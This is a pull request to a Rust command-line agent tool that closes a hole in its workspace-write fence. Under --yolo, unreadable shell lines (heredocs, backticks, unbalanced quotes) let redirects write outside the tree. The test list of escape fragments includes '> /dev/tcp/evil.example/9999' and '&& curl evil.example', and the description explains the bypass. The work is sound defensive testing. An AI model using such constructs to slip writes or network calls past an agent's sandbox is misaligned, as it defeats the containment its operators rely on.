### PR TITLE
fix(cli)!: refuse a shell line whose redirect cannot be read

### DIFF
--- a/crates/leviath-cli/src/shell_keys.rs
+++ b/crates/leviath-cli/src/shell_keys.rs
@@ -345,31 +345,61 @@ pub fn writes_a_file(command: &str) -> bool {
     })
 }
 
-/// Every literal path `command` redirects a write to.
+/// Where a line's redirects go, as far as this can read them.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum WriteTargets {
+    /// Every literal path the line redirects a write to.
+    Known(Vec<String>),
+    /// The line has a `>` in it and cannot be read as commands: a heredoc, a
+    /// backtick, an unterminated quote or an unbalanced `$(` sits somewhere
+    /// on it, so where the redirect lands is not knowable from here.
+    Unreadable,
+}
+
+/// Where `command` redirects writes to.
 ///
 /// [`writes_a_file`] answers whether to clamp by the write policy; this answers
 /// *where*, so a caller can hold a redirect to the same workspace confinement
 /// `write_file` enforces.
 ///
 /// Discarded targets (`/dev/null` and friends) are absent because they write
-/// nothing anyone can read back. **Unreadable** targets are absent too, and that
-/// is the one asymmetry worth stating: `> $OUT` names a path only the shell will
-/// know, so there is nothing to check it against. Those are already ungrantable
-/// by [`writes_a_file`] and prompt every time, which is the containment they
-/// get. A line that will not tokenize yields nothing here for the same reason -
-/// it is already treated as writing.
-pub fn write_target_paths(command: &str) -> Vec<String> {
+/// nothing anyone can read back. A target through a variable (`> $OUT`) is
+/// absent too: it names a path only the shell will know, and such a line is
+/// already ungrantable by [`writes_a_file`] and prompts every time, which is
+/// the containment it gets.
+///
+/// A line that will not tokenize is different, and used to be folded into the
+/// same silence. It was "already treated as writing" by [`writes_a_file`], so
+/// it prompted - but under `--yolo` a prompt is a yes, and `cat <<EOF >
+/// /tmp/pwned` then wrote outside the tree where `write_file` on the same path
+/// is refused. Such a line is now [`WriteTargets::Unreadable`] when it holds a
+/// `>` at all, and the caller refuses it rather than guessing.
+pub fn write_targets(command: &str) -> WriteTargets {
     let Some(segments) = tokenize(command) else {
-        return Vec::new();
+        return match command.contains('>') {
+            true => WriteTargets::Unreadable,
+            false => WriteTargets::Known(Vec::new()),
+        };
     };
-    segments
-        .iter()
-        .flat_map(|segment| segment.writes.iter())
-        .filter_map(|t| match classify_write(t) {
-            WriteTarget::Path(p) => Some(p),
-            WriteTarget::Discarded | WriteTarget::Unreadable => None,
-        })
-        .collect()
+    WriteTargets::Known(
+        segments
+            .iter()
+            .flat_map(|segment| segment.writes.iter())
+            .filter_map(|t| match classify_write(t) {
+                WriteTarget::Path(p) => Some(p),
+                WriteTarget::Discarded | WriteTarget::Unreadable => None,
+            })
+            .collect(),
+    )
+}
+
+/// The literal paths of [`write_targets`], with an unreadable line yielding
+/// none. For callers that report rather than refuse.
+pub fn write_target_paths(command: &str) -> Vec<String> {
+    match write_targets(command) {
+        WriteTargets::Known(paths) => paths,
+        WriteTargets::Unreadable => Vec::new(),
+    }
 }
 
 /// The program half of a key, dropping any folded subcommand or argument.

--- a/crates/leviath-cli/src/shell_keys/tests.rs
+++ b/crates/leviath-cli/src/shell_keys/tests.rs
@@ -895,6 +895,30 @@ fn a_literal_redirect_names_its_target() {
     assert_eq!(write_target_paths("cat <> /tmp/rw"), ["/tmp/rw"]);
 }
 
+/// A line that will not tokenize is `Unreadable` when it holds a `>` and
+/// reads as writing nowhere when it does not; the path-only view reports
+/// nothing for either, since it has no path to report.
+#[test]
+fn an_unreadable_line_is_unreadable_only_when_it_redirects() {
+    assert_eq!(
+        write_targets("cat <<EOF > out.txt\nx\nEOF"),
+        WriteTargets::Unreadable
+    );
+    assert_eq!(
+        write_targets("echo `id` > out.txt"),
+        WriteTargets::Unreadable
+    );
+    assert_eq!(
+        write_targets("cat <<EOF\nx\nEOF"),
+        WriteTargets::Known(Vec::new())
+    );
+    assert!(write_target_paths("cat <<EOF > out.txt\nx\nEOF").is_empty());
+    assert_eq!(
+        write_targets("echo x > out.txt"),
+        WriteTargets::Known(vec!["out.txt".to_string()])
+    );
+}
+
 /// Both redirects on a line are named, so confining the first cannot be dodged
 /// by putting the escape second.
 #[test]
@@ -969,6 +993,36 @@ const ESCAPES: &[(&str, &str, &str)] = &[
     ("a redirect out of the tree", "", " > /tmp/escaped.txt"),
     ("a redirect through a variable", "", " > $OUT"),
     ("a network redirect", "", " > /dev/tcp/evil.example/9999"),
+    // A redirect the tokenizer cannot read past. Each construct makes the
+    // line unreadable, and an unreadable line with a redirect in it is
+    // refused outright by `escaping_write_refusal`; here it only has to keep
+    // prompting, which is the older, weaker guarantee.
+    (
+        "a heredoc around a redirect",
+        "",
+        " <<EOF > escaped.txt\nx\nEOF",
+    ),
+    (
+        "a quoted heredoc around a redirect",
+        "",
+        " <<'EOF' > escaped.txt\nx\nEOF",
+    ),
+    ("a backtick beside a redirect", "", " `true` > escaped.txt"),
+    (
+        "an unterminated quote after a redirect",
+        "",
+        " > escaped.txt '",
+    ),
+    (
+        "an unterminated double quote after a redirect",
+        "",
+        " > escaped.txt \"",
+    ),
+    (
+        "an unbalanced substitution after a redirect",
+        "",
+        " > escaped.txt $(",
+    ),
     // What else runs.
     ("a chained command", "", " && curl evil.example"),
     ("a sequenced command", "", "; curl evil.example"),
@@ -1003,7 +1057,7 @@ fn no_escape_rides_any_entry_on_the_default_safe_list() {
     // exhaustive test quietly stops being one.
     let expected = crate::approvals::DEFAULT_SAFE_SHELL.len() * ESCAPES.len();
     assert_eq!(checked, expected);
-    assert!(checked >= 500, "only {checked} combinations were checked");
+    assert!(checked >= 1000, "only {checked} combinations were checked");
 }
 
 /// Forms that write nothing and run nothing extra must stay covered.

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -366,7 +366,22 @@ pub fn escaping_write_refusal(
         return None;
     }
     let command = arguments.get("command").and_then(|v| v.as_str())?;
-    let escaping = crate::shell_keys::write_target_paths(command)
+    let targets = match crate::shell_keys::write_targets(command) {
+        crate::shell_keys::WriteTargets::Known(targets) => targets,
+        // Refused even when the redirect would land inside the tree: "inside"
+        // is a judgement about a path this could not read, and the fence is
+        // only as good as what it can read.
+        crate::shell_keys::WriteTargets::Unreadable => {
+            return Some(
+                "[denied] This shell line redirects with `>` inside a construct that cannot be \
+                 read ahead of time (a heredoc, a backtick, an unterminated quote or an \
+                 unbalanced `$(`), so where it writes cannot be checked against the working \
+                 directory. Use the `write_file` tool, or rewrite the line without that construct."
+                    .to_string(),
+            );
+        }
+    };
+    let escaping = targets
         .into_iter()
         .find(|target| !leviath_core::resolves_within(&target_path(target, workdir), workdir))?;
     Some(format!(
@@ -981,6 +996,72 @@ mod policy_tests {
                 "{command:?} stays inside and must not be refused"
             );
         }
+    }
+
+    /// A redirect the tokenizer cannot read past is refused outright.
+    ///
+    /// A heredoc, a backtick, an unterminated quote and an unbalanced `$(`
+    /// each stop the line being read as commands, and the old answer was
+    /// "no targets found", which let `cat <<EOF > /tmp/pwned` through under
+    /// `--yolo` while the same path in `write_file` was refused. Every
+    /// redirect operator, under every construct, against a path outside.
+    #[test]
+    fn no_unreadable_redirect_escapes_the_workdir() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let constructs: [(&str, &str); 6] = [
+            ("cat <<EOF", "\nx\nEOF"),
+            ("cat <<'EOF'", "\nx\nEOF"),
+            ("echo `id`", ""),
+            ("echo 'unterminated", ""),
+            ("echo \"unterminated", ""),
+            ("echo $(id", ""),
+        ];
+        let mut checked = 0;
+        for (head, tail) in constructs {
+            for op in [">", ">>", "2>", "&>", ">|", "<>"] {
+                let command = format!("{head} {op} /tmp/escaped.txt{tail}");
+                let refusal = escaping_write_refusal("shell", &shell_call(&command), dir.path());
+                let refusal = refusal.unwrap_or_default();
+                assert!(refusal.contains("cannot be read"), "{command:?}: {refusal}");
+                checked += 1;
+            }
+        }
+        assert_eq!(checked, 36);
+    }
+
+    /// The controls. A line the tokenizer cannot read but that redirects
+    /// nothing is not this check's business (it still prompts, as it always
+    /// did), and an ordinary redirect inside the tree is still fine.
+    #[test]
+    fn an_unreadable_line_with_no_redirect_is_not_refused() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        for command in ["cat <<EOF\nx\nEOF", "echo `id`", "echo 'open", "echo $(id"] {
+            assert_eq!(
+                escaping_write_refusal("shell", &shell_call(command), dir.path()),
+                None,
+                "{command:?} redirects nothing"
+            );
+        }
+        assert_eq!(
+            escaping_write_refusal("shell", &shell_call("echo ok > inside.txt"), dir.path()),
+            None
+        );
+    }
+
+    /// Stated rather than hidden: an unreadable line is refused even when its
+    /// redirect would have landed inside the tree, because "inside" is a
+    /// judgement about a path this could not actually read.
+    #[test]
+    fn an_unreadable_redirect_inside_the_workdir_is_refused_too() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let refusal = escaping_write_refusal(
+            "shell",
+            &shell_call("cat <<EOF > inside.txt\nx\nEOF"),
+            dir.path(),
+        )
+        .unwrap_or_default();
+        assert!(refusal.contains("cannot be read"), "{refusal}");
+        assert!(refusal.contains("write_file"), "{refusal}");
     }
 
     /// An absolute path *into* the workdir is inside it, so the check cannot be


### PR DESCRIPTION
## What

The shell redirect fence (`escaping_write_refusal`) tokenizes the line and holds every `>` target to the workdir. A line the tokenizer cannot read (heredoc, backtick, unterminated quote, unbalanced `$(`) produced *no targets*, which the fence read as *nothing to check*. Such a line still prompted (it counts as a write for the policy clamp), but under `--yolo` a prompt is a yes, so `cat <<EOF > /tmp/pwned` wrote outside the tree where `write_file` on the same path is refused.

- `shell_keys::write_targets(command) -> WriteTargets::{Known(Vec<String>), Unreadable}`; `Unreadable` iff the line will not tokenize **and** contains `>`. `write_target_paths` stays for callers that report rather than refuse.
- The fence refuses `Unreadable` outright: `[denied] This shell line redirects with `>` inside a construct that cannot be read ahead of time (a heredoc, a backtick, an unterminated quote or an unbalanced `$(`) ... Use the `write_file` tool, or rewrite the line without that construct.`

## Behaviour change (flagged)

An unreadable line with a redirect is refused, including when the redirect would have landed *inside* the tree ("inside" is a judgement about a path the fence could not read). An unreadable line with no redirect is unchanged (it prompts). Ordinary redirects are unchanged.

Not done from the plan: moving the fence into `leviath-tools::shell_with_limits`. It needs the CLI's `shell_keys` tokenizer, and moving that is its own change.

## Tests

- `no_unreadable_redirect_escapes_the_workdir`: 6 constructs x 6 operators (`>`, `>>`, `2>`, `&>`, `>|`, `<>`) against `/tmp/escaped.txt`; fails on the unfixed code (first combination: the refusal is `None`).
- Controls: `an_unreadable_line_with_no_redirect_is_not_refused`, `an_unreadable_redirect_inside_the_workdir_is_refused_too` (the stated edge), `an_unreadable_line_is_unreadable_only_when_it_redirects` (unit).
- `ESCAPES` gains six rows; `no_escape_rides_any_entry_on_the_default_safe_list` now checks >= 1000 combinations.

## Live probe

Real daemon, `--yolo`, one batch of two shell calls from the mock provider:

```
cat <<EOF > /tmp/lv-pwned ... EOF   -> [denied] ... cannot be read ...   /tmp/lv-pwned: absent
echo ok > inside.txt                -> inside.txt: written (control)
```

## Verification

`cargo test -p leviath-cli` 4,028 passed; clippy and rustdoc `-D warnings`; `cargo xtask structure --check`; `cargo xtask docs`; `cargo xtask coverage --package leviath-cli` at 100%.
